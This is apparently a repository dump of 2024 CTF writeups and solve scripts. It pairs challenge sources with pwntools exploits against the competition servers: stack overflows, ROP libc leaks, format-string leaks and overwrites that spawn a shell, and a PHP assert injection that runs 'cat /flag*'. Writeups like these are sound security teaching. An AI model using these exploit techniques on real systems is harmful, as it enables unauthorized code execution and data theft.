| 11 | key += struct.pack("B", ct[-1] ^ ord("}")) 12 | 13 | pt = bytes(x ^ y for x, y in zip(ct, cycle(key))) 14 | 15 | print(pt.decode()) # uiuctf{n0t_ju5t_th3_st4rt_but_4l50_th3_3nd!!!!!} 16 | -------------------------------------------------------------------------------- /2024_06_29_UIUCTFCTF24/crypto/x_marked_the_spot/public.py: -------------------------------------------------------------------------------- 1 | from itertools import cycle 2 | 3 | flag = b"uiuctf{????????????????????????????????????????}" 4 | # len(flag) = 48 5 | key = b"????????" 6 | # len(key) = 8 7 | ct = bytes(x ^ y for x, y in zip(flag, cycle(key))) 8 | 9 | with open("ct", "wb") as ct_file: 10 | ct_file.write(ct) 11 | -------------------------------------------------------------------------------- /2024_06_29_UIUCTFCTF24/crypto/x_marked_the_spot/writeup.md: -------------------------------------------------------------------------------- 1 | https://ctftime.org/event/2275 2 | 3 | # X Marked the Spot (crypto) 4 | 5 | A perfect first challenge for beginners. Who said pirates can't ride trains... 6 | 7 | ## Solution 8 | 9 | The flag is xored with the key. 10 | 11 | We know that the flag format is `uiuctf{.+}`. 12 | 13 | This means we can recover the first 7 bytes of the keystream by xoring it with `uiuctf{`. 14 | 15 | We can obtain the final byte of the keystream two ways: 16 | 17 | 1) Notice that the length of the ciphertext, and therefore the plaintext, is a multiple of 8. This means that the 8th byte of the key was used to encrypt `"}"` 18 | 2) Simply try all possible values for the final byte of the key, optionally limiting this to `string.printable`, and look for a plaintext that ends with `"}"` 19 | 20 | ```python 21 | import struct 22 | from itertools import cycle 23 | 24 | with open("ct", "rb") as file: 25 | ct = file.read() 26 | 27 | key = b"" 28 | for i, c in enumerate("uiuctf{"): 29 | key += struct.pack("B", ct[i] ^ ord(c)) 30 | 31 | key += struct.pack("B", ct[-1] ^ ord("}")) 32 | 33 | pt = bytes(x ^ y for x, y in zip(ct, cycle(key))) 34 | 35 | print(pt.decode()) 36 | ``` 37 | 38 | ## Flag 39 | `uiuctf{n0t_ju5t_th3_st4rt_but_4l50_th3_3nd!!!!!}` 40 | 41 | smiley 2024/06/30 42 | -------------------------------------------------------------------------------- /2024_06_29_UIUCTFCTF24/misc/push_and_pickle/chal.py: -------------------------------------------------------------------------------- 1 | import pickle 2 | import base64 3 | import sys 4 | import pickletools 5 | 6 | def check_flag(flag_guess: str): 7 | """REDACTED FOR PRIVACY""" 8 | 9 | cucumber = base64.b64decode(input("Give me your best pickle (base64 encoded) to taste! ")) 10 | 11 | for opcode, _, _ in pickletools.genops(cucumber): 12 | if opcode.code == "c" or opcode.code == "\x93": 13 | print("Eww! I can't eat dill pickles.") 14 | sys.exit(0) 15 | 16 | pickle.loads(cucumber) 17 | -------------------------------------------------------------------------------- /2024_06_29_UIUCTFCTF24/pwn/syscalls/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM ubuntu:22.04 as chroot 2 | FROM gcr.io/kctf-docker/challenge@sha256:eb0f8c3b97460335f9820732a42702c2fa368f7d121a671c618b45bbeeadab28 3 | 4 | COPY --from=chroot / /chroot 5 | RUN mkdir -p /chroot/home/user 6 | COPY ./syscalls /chroot/home/user 7 | COPY ./flag.txt /chroot/home/user 8 | 9 | COPY nsjail.cfg /home/user/ 10 | 11 | CMD kctf_setup && \ 12 | kctf_drop_privs \ 13 | socat \ 14 | TCP-LISTEN:1337,reuseaddr,fork \ 15 | EXEC:"kctf_pow nsjail --config /home/user/nsjail.cfg -- /home/user/syscalls" 16 | -------------------------------------------------------------------------------- /2024_06_29_UIUCTFCTF24/pwn/syscalls/Dockerfile.local: -------------------------------------------------------------------------------- 1 | # admins provided this during the ctf as the Dockerfile given with the task 2 | # is missing the nsjail config and can't be easily used 3 | 4 | FROM ubuntu:22.04 5 | RUN apt-get update && apt-get -y install socat 6 | RUN mkdir -p /chroot/home/user 7 | COPY ./syscalls /chroot/home/user 8 | COPY ./flag.txt /chroot/home/user 9 | CMD socat TCP-LISTEN:1337,reuseaddr,fork EXEC:"/chroot/home/user/syscalls" 10 | -------------------------------------------------------------------------------- /2024_06_29_UIUCTFCTF24/pwn/syscalls/syscalls: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2024_06_29_UIUCTFCTF24/pwn/syscalls/syscalls -------------------------------------------------------------------------------- /2024_07_06_DUCTF24/README.md: -------------------------------------------------------------------------------- 1 | # DUCTF 2024 Writeups 2 | 3 | https://ctftime.org/event/2284 4 | 5 | 647th place 809 points 6 | -------------------------------------------------------------------------------- /2024_07_06_DUCTF24/pwn/vector_overflow/go.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from pwn import * 4 | 5 | #context.log_level = "debug" 6 | elf = ELF("./vector_overflow", checksec=False) 7 | context.binary = elf 8 | 9 | #p = elf.process() 10 | #p = elf.debug(gdbscript="") 11 | p = remote("2024.ductf.dev", 30013) 12 | 13 | BUF = 0x4051e0 14 | 15 | payload = b"" 16 | payload += b"DUCTF" 17 | payload += b"\x00" * 11 # fill up to 16 bytes 18 | payload += p64(BUF) # v.start 19 | payload += p64(BUF + 5) # v.end 20 | payload += p64(BUF + 5) # v.capacity 21 | 22 | p.sendline(payload) 23 | 24 | p.interactive() 25 | -------------------------------------------------------------------------------- /2024_07_06_DUCTF24/pwn/vector_overflow/vector_overflow: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2024_07_06_DUCTF24/pwn/vector_overflow/vector_overflow -------------------------------------------------------------------------------- /2024_07_06_DUCTF24/pwn/vector_overflow/vector_overflow.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | 6 | char buf[16]; 7 | std::vector v = {'X', 'X', 'X', 'X', 'X'}; 8 | 9 | void lose() { 10 | puts("Bye!"); 11 | exit(1); 12 | } 13 | 14 | void win() { 15 | system("/bin/sh"); 16 | exit(0); 17 | } 18 | 19 | int main() { 20 | char ductf[6] = "DUCTF"; 21 | char* d = ductf; 22 | 23 | std::cin >> buf; 24 | if(v.size() == 5) { 25 | for(auto &c : v) { 26 | if(c != *d++) { 27 | lose(); 28 | } 29 | } 30 | 31 | win(); 32 | } 33 | 34 | lose(); 35 | } 36 | -------------------------------------------------------------------------------- /2024_07_06_DUCTF24/pwn/yawa/ld-linux-x86-64.so.2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2024_07_06_DUCTF24/pwn/yawa/ld-linux-x86-64.so.2 -------------------------------------------------------------------------------- /2024_07_06_DUCTF24/pwn/yawa/libc.so.6: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2024_07_06_DUCTF24/pwn/yawa/libc.so.6 -------------------------------------------------------------------------------- /2024_07_06_DUCTF24/pwn/yawa/yawa: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2024_07_06_DUCTF24/pwn/yawa/yawa -------------------------------------------------------------------------------- /2024_07_06_DUCTF24/pwn/yawa/yawa.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | void init() { 6 | setvbuf(stdin, 0, 2, 0); 7 | setvbuf(stdout, 0, 2, 0); 8 | } 9 | 10 | int menu() { 11 | int choice; 12 | puts("1. Tell me your name"); 13 | puts("2. Get a personalised greeting"); 14 | printf("> "); 15 | scanf("%d", &choice); 16 | return choice; 17 | } 18 | 19 | int main() { 20 | init(); 21 | 22 | char name[88]; 23 | int choice; 24 | 25 | while(1) { 26 | choice = menu(); 27 | if(choice == 1) { 28 | read(0, name, 0x88); 29 | } else if(choice == 2) { 30 | printf("Hello, %s\n", name); 31 | } else { 32 | break; 33 | } 34 | } 35 | } 36 | -------------------------------------------------------------------------------- /2024_07_06_DUCTF24/rev/number_mashing/go.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from pwn import * 4 | from z3 import * 5 | 6 | x = BitVec('x', 32) # local_11c 7 | y = BitVec('y', 32) # local_118 8 | 9 | s = Solver() 10 | 11 | s.add(x != 0) 12 | s.add(y != 0) 13 | s.add(y != 1) 14 | s.add(x == (x / y)) 15 | 16 | s.check() 17 | m = s.model() 18 | 19 | p = remote("2024.ductf.dev", 30014) 20 | 21 | p.sendline(f"{m[x].as_long()} {m[y].as_long()}".encode()) # 2147483648 4294967295 22 | 23 | p.interactive() # DUCTF{w0w_y0u_just_br0ke_math!!} 24 | -------------------------------------------------------------------------------- /2024_07_06_DUCTF24/rev/number_mashing/number-mashing: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2024_07_06_DUCTF24/rev/number_mashing/number-mashing -------------------------------------------------------------------------------- /2024_07_06_DUCTF24/rev/number_mashing/writeup.md: -------------------------------------------------------------------------------- 1 | https://ctftime.org/event/2284 2 | 3 | # number mashing (crypto) 4 | 5 | Mash your keyboard numpad in a specific order and a flag might just pop out! 6 | 7 | nc 2024.ductf.dev 30014 8 | 9 | ## Analysis 10 | 11 | The code in the binary roughly decompiles to the following: 12 | 13 | ```c 14 | int x, y; 15 | scanf("%d %d", &x, &y); 16 | assert(x != 0 && y != 0 && y != 1); 17 | assert(x == (x / y)); 18 | ``` 19 | 20 | ## Solution 21 | 22 | 1) Use z3 to solve the for the constraints in the binary 23 | 2) Supply the inputs that satisfy the model 24 | 3) Wonder if the task was actually trying to teach you something about numbers work 25 | 26 | ```python 27 | #!/usr/bin/env python3 28 | 29 | from pwn import * 30 | from z3 import * 31 | 32 | x = BitVec('x', 32) # local_11c 33 | y = BitVec('y', 32) # local_118 34 | 35 | s = Solver() 36 | 37 | s.add(x != 0) 38 | s.add(y != 0) 39 | s.add(y != 1) 40 | s.add(x == (x / y)) 41 | 42 | s.check() 43 | m = s.model() 44 | 45 | p = remote("2024.ductf.dev", 30014) 46 | 47 | p.sendline(f"{m[x].as_long()} {m[y].as_long()}".encode()) # 2147483648 4294967295 48 | 49 | p.interactive() # DUCTF{w0w_y0u_just_br0ke_math!!} 50 | ``` 51 | 52 | ## Flag 53 | `DUCTF{w0w_y0u_just_br0ke_math!!}` 54 | 55 | smiley 2024/07/06 56 | -------------------------------------------------------------------------------- /2024_07_13_OSCTF24/README.md: -------------------------------------------------------------------------------- 1 | # OSCTF 2024 Writeups 2 | 3 | https://ctftime.org/event/2416 4 | 5 | 194th place 1565 points 6 | -------------------------------------------------------------------------------- /2024_07_13_OSCTF24/pwn/buffer_buffet/go.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from pwn import * 4 | 5 | #context.log_level = "debug" 6 | elf = ELF("./vuln", checksec=False) 7 | context.binary = elf 8 | 9 | #p = elf.process() 10 | #p = elf.debug(gdbscript="") 11 | p = remote("34.125.199.248", 4056) 12 | 13 | p.readline() 14 | 15 | payload = b"A" * 0x198 16 | payload += p64(elf.sym["secretFunction"]) 17 | 18 | p.sendline(payload) 19 | 20 | p.readuntil(b"Flag: ") 21 | 22 | flag = p.readline() 23 | 24 | log.success(flag.decode()) # OSCTF{buff3r_buff3t_w4s_e4sy!} 25 | -------------------------------------------------------------------------------- /2024_07_13_OSCTF24/pwn/buffer_buffet/vuln: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2024_07_13_OSCTF24/pwn/buffer_buffet/vuln -------------------------------------------------------------------------------- /2024_07_13_OSCTF24/pwn/buffer_buffet/writeup.md: -------------------------------------------------------------------------------- 1 | https://ctftime.org/event/2416 2 | 3 | # buffer_buffet (pwn) 4 | 5 | As an elite hacker invited to an exclusive digital banquet, you must navigate through the layers of a complex software system. Among the appetizers, main course, and dessert lies a hidden entry point that, when discovered, reveals a treasure trove of sensitive information. 6 | 7 | nc 34.125.199.248 4056 8 | 9 | ## Solution 10 | 11 | 1) ret2win @ `secretFunction` 12 | 13 | ```python 14 | #!/usr/bin/env python3 15 | 16 | from pwn import * 17 | 18 | #context.log_level = "debug" 19 | elf = ELF("./vuln", checksec=False) 20 | context.binary = elf 21 | 22 | #p = elf.process() 23 | #p = elf.debug(gdbscript="") 24 | p = remote("34.125.199.248", 4056) 25 | 26 | p.readline() 27 | 28 | payload = b"A" * 0x198 29 | payload += p64(elf.sym["secretFunction"]) 30 | 31 | p.sendline(payload) 32 | 33 | p.readuntil(b"Flag: ") 34 | 35 | flag = p.readline() 36 | 37 | log.success(flag.decode()) # OSCTF{buff3r_buff3t_w4s_e4sy!} 38 | ``` 39 | 40 | ## Flag 41 | `OSCTF{buff3r_buff3t_w4s_e4sy!}` 42 | 43 | smiley 2024/07/13 44 | -------------------------------------------------------------------------------- /2024_07_13_OSCTF24/pwn/byte_breakup/go.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from pwn import * 4 | import struct 5 | 6 | #context.log_level = "debug" 7 | elf = ELF("./vuln_patched", checksec=False) 8 | context.binary = elf 9 | 10 | libc = ELF("./libc.so.6", checksec=False) 11 | 12 | #p = elf.process() 13 | #p = elf.debug(gdbscript="") 14 | p = remote("34.125.199.248", 6969) 15 | 16 | p.readuntil(b"password: \n") 17 | 18 | rop = ROP(elf) 19 | rop.raw(b"A" * 0x28) 20 | rop.rdi = elf.got["puts"] 21 | rop.call(elf.plt["puts"]) 22 | rop.call(elf.sym["main"]) 23 | p.sendline(rop.chain()) 24 | 25 | p.readline() 26 | p.readline() 27 | 28 | leak = struct.unpack(" ") 16 | p.send(b"A" * 32) 17 | p.readuntil(b"Ok... its name is ") 18 | p.read(32) 19 | 20 | canary = p.read(8) 21 | log.success(canary.hex()) 22 | 23 | p = remote("34.125.199.248", 5674) 24 | p.sendline(str(0x38 + 2).encode()) 25 | 26 | p.readuntil(b"> ") 27 | 28 | payload = b"" 29 | payload += b"B" * 32 30 | payload += canary 31 | payload += b"\x00" * 16 32 | payload += b"\x??\x??" # unclear what this should be 33 | p.send(payload) 34 | 35 | p.interactive() 36 | -------------------------------------------------------------------------------- /2024_07_13_OSCTF24/pwn/leaky_pipes/go.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from pwn import * 4 | 5 | #context.log_level = "debug" 6 | elf = ELF("./leaky_pipes", checksec=False) 7 | context.binary = elf 8 | 9 | #p = elf.process() 10 | #p = elf.debug(gdbscript="") 11 | p = remote("34.125.199.248", 1337) 12 | 13 | p.readuntil(b">> ") 14 | 15 | p.sendline(b"%36$p.%37$p.%38$p.%39$p.%40$p.%41$p.%42$p.%43$p.%44$p.") 16 | 17 | p.readline() 18 | 19 | dwords = p.readline().decode().split(".")[:-1] 20 | 21 | flag = b"" 22 | for dword in dwords: 23 | flag += int(dword, 16).to_bytes(length=4, byteorder="little") 24 | 25 | flag = flag[:flag.index(b"}")+1] 26 | 27 | log.success(flag.decode()) # OSCTF{F0rm4t_5tr1ngs_l3ak4g3_l0l} 28 | -------------------------------------------------------------------------------- /2024_07_13_OSCTF24/pwn/leaky_pipes/leaky_pipes: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2024_07_13_OSCTF24/pwn/leaky_pipes/leaky_pipes -------------------------------------------------------------------------------- /2024_07_13_OSCTF24/pwn/leaky_pipes/writeup.md: -------------------------------------------------------------------------------- 1 | https://ctftime.org/event/2416 2 | 3 | # leaky_pipes (pwn) 4 | 5 | Welcome to Leaky Pipes, where a seemingly innocent program has sprung a serious leak! Your mission is to uncover the concealed flag hidden within the program. Will you be the one to patch the leak and reveal the hidden secret? 6 | 7 | nc 34.125.199.248 1337 8 | 9 | ## Solution 10 | 11 | 1) Leak flag 4 bytes a time using `%p` 12 | 13 | ```python 14 | #!/usr/bin/env python3 15 | 16 | from pwn import * 17 | 18 | #context.log_level = "debug" 19 | elf = ELF("./leaky_pipes", checksec=False) 20 | context.binary = elf 21 | 22 | #p = elf.process() 23 | #p = elf.debug(gdbscript="") 24 | p = remote("34.125.199.248", 1337) 25 | 26 | p.readuntil(b">> ") 27 | 28 | p.sendline(b"%36$p.%37$p.%38$p.%39$p.%40$p.%41$p.%42$p.%43$p.%44$p.") 29 | 30 | p.readline() 31 | 32 | dwords = p.readline().decode().split(".")[:-1] 33 | 34 | flag = b"" 35 | for dword in dwords: 36 | flag += int(dword, 16).to_bytes(length=4, byteorder="little") 37 | 38 | flag = flag[:flag.index(b"}")+1] 39 | 40 | log.success(flag.decode()) # OSCTF{F0rm4t_5tr1ngs_l3ak4g3_l0l} 41 | ``` 42 | 43 | ## Flag 44 | `OSCTF{F0rm4t_5tr1ngs_l3ak4g3_l0l}` 45 | 46 | smiley 2024/07/13 47 | -------------------------------------------------------------------------------- /2024_07_13_OSCTF24/pwn/lib_riddle/challenge: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2024_07_13_OSCTF24/pwn/lib_riddle/challenge -------------------------------------------------------------------------------- /2024_07_13_OSCTF24/pwn/lib_riddle/go.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from pwn import * 4 | import struct 5 | 6 | #context.log_level = "debug" 7 | elf = ELF("./challenge", checksec=False) 8 | context.binary = elf 9 | 10 | libc = ELF("./libc.so.6", checksec=False) 11 | 12 | #p = elf.process() 13 | #p = elf.debug(gdbscript="") 14 | p = remote("34.125.199.248", 7809) 15 | 16 | p.readuntil(b"What's your name?\n") 17 | 18 | rop = ROP(elf) 19 | rop.raw('A' * 0x18) 20 | rop.puts(elf.got['puts']) 21 | rop.raw(elf.sym['main']) 22 | p.sendline(rop.chain()) 23 | 24 | p.readline() 25 | p.readline() 26 | leak = struct.unpack("','<','{','}','class','global','var','local','import','exec','eval','t','set','blacklist'] 6 | while True: 7 | inp = input("Enter input: ") 8 | for i in blacklist: 9 | if i in inp: 10 | print("ok nice") 11 | exit(0) 12 | for i in inp: 13 | if (ord(i) > 125) or (ord(i) < 40) or (len(set(inp))>17): 14 | print("ok nice") 15 | exit(0) 16 | try: 17 | eval(inp,{'__builtins__':None,'ord':ord,'flag':flag}) 18 | print("ok nice") 19 | except: 20 | print("error") 21 | -------------------------------------------------------------------------------- /2024_07_19_Imaginary24/misc/starship/files.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2024_07_19_Imaginary24/misc/starship/files.zip -------------------------------------------------------------------------------- /2024_07_19_Imaginary24/misc/starship/go.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from pwn import * 4 | 5 | #context.log_level = "debug" 6 | p = remote("starship.chal.imaginaryctf.org", 1337) 7 | 8 | p.sendlineafter(b"> ", b"4") 9 | 10 | p.readuntil(b"target 1: ") 11 | 12 | target1 = p.readline().decode().split("|")[0][:-1].split(",") 13 | 14 | p.readuntil(b"target 2: ") 15 | 16 | target2 = p.readline().decode().split("|")[0][:-1].split(",") 17 | 18 | between = "" 19 | for i in range(9): 20 | between += f"{(int(target1[i]) + int(target2[i])) // 2}," 21 | between += "friendly" 22 | 23 | p.sendlineafter(b"> ", b"42") 24 | p.sendlineafter(b"enter data: ", between.encode()) 25 | 26 | p.sendlineafter(b"> ", b"2") 27 | 28 | p.sendlineafter(b"> ", b"4") 29 | 30 | p.readline() 31 | p.readline() 32 | 33 | log.success(p.readline().decode()) # ictf{m1ssion_succ3ss_8fac91385b77b026} 34 | -------------------------------------------------------------------------------- /2024_07_19_Imaginary24/pwn/imgstore/files.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2024_07_19_Imaginary24/pwn/imgstore/files.zip -------------------------------------------------------------------------------- /2024_07_19_Imaginary24/pwn/imgstore/go.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from pwn import * 4 | 5 | #context.log_level = "debug" 6 | elf = ELF("./imgstore_patched", checksec=False) 7 | context.binary = elf 8 | 9 | libc = ELF("./libc.so.6", checksec=False) 10 | 11 | #p = elf.process() 12 | #p = elf.debug(gdbscript="") 13 | p = remote("imgstore.chal.imaginaryctf.org", 1337) 14 | 15 | p.sendlineafter(b">> ", b"3") 16 | 17 | p.sendlineafter(b"Enter book title: ", b"%p.%p.%25$p") 18 | 19 | p.readuntil(b"--> ") 20 | 21 | leaks = p.readline().decode().split(".") 22 | stack_leak = int(leaks[0], 16) + 10040 23 | 24 | libc_leak = int(leaks[2], 16) 25 | libc.address = libc_leak - 0x0024083 26 | 27 | # perform a partial rewrite of a libc return address in two stages 28 | one_gadget = libc.address + 0xe3b01 29 | 30 | p.sendlineafter(b"[y/n]: ", b"y") # first byte only 31 | p.readuntil(b"Enter book title: ") 32 | p.sendline(fmtstr_payload(8, {stack_leak: p8(one_gadget & 0xff)})) 33 | 34 | p.sendlineafter(b"[y/n]: ", b"y") # bytes two and three next 35 | p.readuntil(b"Enter book title: ") 36 | p.sendline(fmtstr_payload(8, {stack_leak+1: p16(((one_gadget) >> 8) & 0xffff)})) 37 | 38 | p.sendlineafter(b"[y/n]: ", b"n") # ret2one_gadget 39 | 40 | p.sendline( b"/bin/cat flag.txt") 41 | 42 | p.interactive() # ictf{b4byy_f3rM4T_5Tr1nn66S} 43 | -------------------------------------------------------------------------------- /2024_07_19_Imaginary24/web/journal/writeup.md: -------------------------------------------------------------------------------- 1 | https://ctftime.org/event/2396 2 | 3 | # journal (web) 4 | 5 | one file php challenge 6 | 7 | ## Solution 8 | 9 | At first i thought there was some include path stuff. 10 | But after trying every byte there were some interesting messages about assert. 11 | And its apparently well known: 12 | https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/php-tricks-esp 13 | 14 | ```python 15 | import requests 16 | 17 | payload = "file1.txt' and die(system(\"cat /flag*\")) or '" 18 | res = requests.get("http://journal.chal.imaginaryctf.org/", params={"file":payload}) 19 | print(f"DEBUGPRINT[1]: go.py:14: res.text={res.text}") 20 | ``` 21 | 22 | ## Flag 23 | `ictf{assertion_failed_e3106922feb13b10}` 24 | 25 | shafouz 2024/07/21 26 | -------------------------------------------------------------------------------- /2024_07_26_DeadSecCTF24/README.md: -------------------------------------------------------------------------------- 1 | # DeadSec 2024 Writeups 2 | 3 | https://ctftime.org/event/2353 4 | 5 | 314th place 200 points 6 | -------------------------------------------------------------------------------- /2024_07_26_DeadSecCTF24/crypto/flag_killer/go.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from pwn import * 4 | 5 | from binascii import unhexlify 6 | 7 | with open("./enc.txt", "r") as f: 8 | enc = f.read() 9 | 10 | letters = [] 11 | for i in range(0, len(enc), 5): 12 | letters.append(enc[i:i+5]) 13 | 14 | def FLAG_KILLER(value): 15 | index = 0 16 | temp = [] 17 | output = 0 18 | while value > 0: 19 | temp.append(2 - (value % 4) if value % 2 != 0 else 0) 20 | value = (value - temp[index])/2 21 | index += 1 22 | temp = temp[::-1] 23 | for index in range(len(temp)): 24 | output += temp[index] * 3 ** (len(temp) - index - 1) 25 | return output 26 | 27 | flag = 0 28 | 29 | for i in range(len(letters)): 30 | for j in range(0x1000): 31 | if (FLAG_KILLER(j) == int(letters[i], 16)): 32 | flag = (flag << 12) + j 33 | 34 | flag = unhexlify(hex(flag)[2:] + "0")[:-2] + b"}" 35 | 36 | print(flag.decode()) # DEAD{263f871e880e9dc7d2401000304fc60e98c7c588} -------------------------------------------------------------------------------- /2024_07_26_DeadSecCTF24/crypto/flag_killer/public.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2024_07_26_DeadSecCTF24/crypto/flag_killer/public.zip -------------------------------------------------------------------------------- /2024_07_26_DeadSecCTF24/pwn/super_cpp_calculator/go.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from pwn import * 4 | 5 | #context.log_level = "debug" 6 | elf = ELF("./test", checksec=False) 7 | context.binary = elf 8 | 9 | #p = elf.process() 10 | #p = elf.debug(gdbscript="b *0x0000000000401716") 11 | p = remote("34.30.75.212", 32059) 12 | 13 | p.sendlineafter(b">", b"1") 14 | p.sendlineafter(b"> ", b"1.2") 15 | p.sendlineafter(b"> ", b"0.00012") 16 | 17 | p.sendlineafter(b"> ", b"1337") 18 | p.readline() 19 | payload = b"" 20 | payload += b"A" * 0x408 21 | payload += p64(elf.sym["_Z3winv"] + 8) 22 | p.sendlineafter(b"> ", payload) 23 | 24 | p.sendline(b"/bin/cat flag.txt") 25 | 26 | log.success(p.readline().decode()) # DEAD{so_ez_pwn_hehe} 27 | -------------------------------------------------------------------------------- /2024_07_26_DeadSecCTF24/pwn/super_cpp_calculator/public.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2024_07_26_DeadSecCTF24/pwn/super_cpp_calculator/public.zip -------------------------------------------------------------------------------- /2024_08_03_TFCCTF24/README.md: -------------------------------------------------------------------------------- 1 | # TFCCTF 2024 Writeups 2 | 3 | https://ctftime.org/event/2423 4 | 5 | 32nd place 2552 points 6 | -------------------------------------------------------------------------------- /2024_08_03_TFCCTF24/crypto/biased_elections/biased_elections.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2024_08_03_TFCCTF24/crypto/biased_elections/biased_elections.zip -------------------------------------------------------------------------------- /2024_08_03_TFCCTF24/crypto/ccccc/ccccc.txt: -------------------------------------------------------------------------------- 1 | 5c4c4c6c4c3c4c3c5c4c4c6c7cbc6c3c7c3c6c8c6cfc7c5c7c4c5cfc6c3c6cfc7c5c7c4c5cfc6c3c7c4c3c0c5cfc6c3c6cdc7c9c5cfc6c3c6c2c3c0c7c9c5cfc6c3c3c4c6cec6c4c5cfc6c3c6cdc7c9c5cfc6c3c6c4c6cfc6c7c5cfc6c3c6c1c6cec6c4c5cfc6c3c6cdc7c9c5cfc6c3c6c3c3c4c3c7c7cdc0ca 2 | -------------------------------------------------------------------------------- /2024_08_03_TFCCTF24/crypto/ccccc/go.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from binascii import unhexlify 4 | 5 | with open("ccccc.txt", "r") as f: 6 | c = f.read() 7 | 8 | flag = "" 9 | for i in range(0, len(c), 2): 10 | flag += c[i] 11 | 12 | flag = unhexlify(flag)[:-1].decode() 13 | 14 | print(flag) # TFCCTF{cshout_cout_ct0_cmy_cb0y_c4nd_cmy_cdog_cand_cmy_cc47} 15 | -------------------------------------------------------------------------------- /2024_08_03_TFCCTF24/crypto/ccccc/writeup.md: -------------------------------------------------------------------------------- 1 | https://ctftime.org/event/2423 2 | 3 | # ccccc (crypto) 4 | 5 | CCCCC CCCCC CCCCC CCCCC CCCCC CCCCC CCCCC CCCCC CCCCC CCCCC CCCCC CCCCC 6 | 7 | CCCCC CCCCC CCCCC 8 | 9 | ## Solution 10 | 11 | 1) Remove the `c` characters from every other index 12 | 2) Unhex to recover the flag 13 | 14 | ```python 15 | #!/usr/bin/env python3 16 | 17 | from binascii import unhexlify 18 | 19 | with open("ccccc.txt", "r") as f: 20 | c = f.read() 21 | 22 | flag = "" 23 | for i in range(0, len(c), 2): 24 | flag += c[i] 25 | 26 | flag = unhexlify(flag)[:-1].decode() 27 | 28 | print(flag) # TFCCTF{cshout_cout_ct0_cmy_cb0y_c4nd_cmy_cdog_cand_cmy_cc47} 29 | ``` 30 | 31 | ## Flag 32 | `TFCCTF{cshout_cout_ct0_cmy_cb0y_c4nd_cmy_cdog_cand_cmy_cc47}` 33 | 34 | smiley 2024/08/03 35 | -------------------------------------------------------------------------------- /2024_08_03_TFCCTF24/crypto/conway/conway.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2024_08_03_TFCCTF24/crypto/conway/conway.zip -------------------------------------------------------------------------------- /2024_08_03_TFCCTF24/crypto/conway/go.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | import hashlib 4 | from binascii import unhexlify 5 | from Crypto.Cipher import AES 6 | from Crypto.Util.Padding import unpad 7 | 8 | def A005150(n): 9 | """from https://oeis.org/A005150""" 10 | p = "1" 11 | seq = [1] 12 | while (n > 1): 13 | q = '' 14 | idx = 0 # Index 15 | l = len(p) # Length 16 | while idx < l: 17 | start = idx 18 | idx = idx + 1 19 | while idx < l and p[idx] == p[start]: 20 | idx = idx + 1 21 | q = q + str(idx-start) + p[start] 22 | n, p = n - 1, q 23 | seq.append(int(p)) 24 | return seq 25 | 26 | initial = A005150(16)[-1] 27 | 28 | h = hashlib.sha256() 29 | h.update(str(initial).encode()) 30 | key = h.digest() 31 | 32 | #print(key.hex()) # 609fd95c2155dfc76de2212c06b09f4ffa3b911d023b871f45a4eab530b393f3 33 | 34 | ct = unhexlify("f143845f3c4d9ad024ac8f76592352127651ff4d8c35e48ca9337422a0d7f20ec0c2baf530695c150efff20bbc17ca4c") 35 | 36 | cipher = AES.new(key, AES.MODE_ECB) 37 | flag = unpad(cipher.decrypt(ct), 16).decode() 38 | 39 | print(flag) # TFCCTF{c0nway's_g4me_0f_sequences?} 40 | -------------------------------------------------------------------------------- 